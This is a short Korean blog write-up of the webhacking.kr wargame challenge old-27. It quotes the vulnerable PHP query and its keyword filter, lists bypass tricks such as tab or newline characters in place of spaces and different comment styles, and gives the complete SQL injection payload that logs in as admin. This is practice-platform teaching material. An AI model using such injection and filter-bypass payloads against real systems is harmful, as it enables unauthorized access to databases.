-
Webhacking.kr / old-27문제 풀이/webhacking.kr 2024. 8. 22. 12:38
문제
간단한 sql injection 문제이다
소스코드를 확인해보자
해당 부분에 중요한 부분은 다음과 같다
if(preg_match("/#|select|\(| |limit|=|0x/i",$_GET['no'])) exit("no hack");
$r=mysqli_fetch_array(mysqli_query($db,"select id from chall27 where id='guest' and no=({$_GET['no']})")) or die("query error");필터링을 우회하여 id=admin의 결과를 불러오면 된다.
힌트
더보기공백 우회: %09 / %0a / %0b / %0c ...
주석 처리 : # / -- / ;%00 /
정답
더보기0)%09or%09id%09like%09%27admin%27%09--%09
'문제 풀이 > webhacking.kr' 카테고리의 다른 글
Webhacking.kr / old-26 (0) 2024.08.23 Webhacking.kr / old-23 (0) 2024.08.23 Webhacking.kr / old-27 (0) 2024.08.06 Webhacking.kr / old-16 (0) 2024.08.06 Webhacking.kr / old-15 (0) 2024.08.03
